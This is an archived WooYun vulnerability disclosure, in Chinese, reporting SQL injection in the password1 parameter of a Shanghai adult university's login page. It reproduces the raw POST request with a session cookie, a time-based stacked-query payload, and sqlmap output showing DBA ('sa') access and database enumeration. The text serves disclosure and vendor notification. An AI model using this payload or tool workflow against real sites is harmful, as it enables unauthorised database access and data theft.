乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-27: 细节已通知厂商并且等待厂商处理中 2015-12-28: 厂商已经确认,细节仅向厂商公开 2016-01-07: 细节向核心白帽子及相关领域专家公开 2016-01-17: 细节向普通白帽子公开 2016-01-27: 细节向实习白帽子公开 2016-02-09: 细节向公众公开
RT
http://hk.shtvu.edu.cn/ 上海市虹口区业余大学 上海开放大学虹口分校
POST /iclass_hksc/login1.asp HTTP/1.1Content-Length: 73Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://hk.shtvu.edu.cnCookie: ASPSESSIONIDCCSTATSA=HPEFFPHBIDKCNBIDJPJCDAMGHost: hk.shtvu.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*password1=ZhYlJgAz&userid1=lonkxmhh
password1参数存在注入太卡了...
sqlmap resumed the following injection point(s) from stored session:---Parameter: password1 (POST) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: password1=ZhYlJgAz';WAITFOR DELAY '0:0:5'--&userid1=lonkxmhh---[10:14:30] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000[10:14:30] [INFO] fetching current user[10:14:30] [WARNING] time-based comparison requires larger statistical model, please wait..............................do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y[10:14:57] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors[10:15:09] [INFO] adjusting time delay to 3 seconds due to good response timessacurrent user: 'sa'[10:15:37] [INFO] fetching current database[10:15:37] [INFO] retrieved: infodbcurrent database: 'infodb'[10:17:30] [INFO] testing if current user is DBAcurrent user is DBA: True[10:17:34] [INFO] fetching database names[10:17:34] [INFO] fetching number of databases[10:17:34] [INFO] retrieved: 12[10:17:52] [INFO] retrieved: F[10:18:46] [ERROR] invalid character detected. retrying..[10:18:46] [WARNING] increasing time delay to 4 secondsSTKJGL[10:20:44] [INFO] retrieved: iclass_[10:23:31] [ERROR] invalid character detected. retrying..[10:23:31] [WARNING] increasing time delay to 5 secondsf_2007[10:26:14] [INFO] retrieved: infodb[10:28:43] [INFO] retrieved: khdata[10:30:59] [INFO] retrieved: master[10:33:18] [INFO] retrieved: model[10:35:52] [INFO] retrieved: msdb[10:37:38] [INFO] retrieved: N[10:38:46] [ERROR] invalid character detected. retrying..[10:38:46] [WARNING] increasing time delay to 6 seconds
多处存在注入,多处存在注入,多处存在注入
危害等级:中
漏洞Rank:9
确认时间:2015-12-28 08:41
已通知相关部门
暂无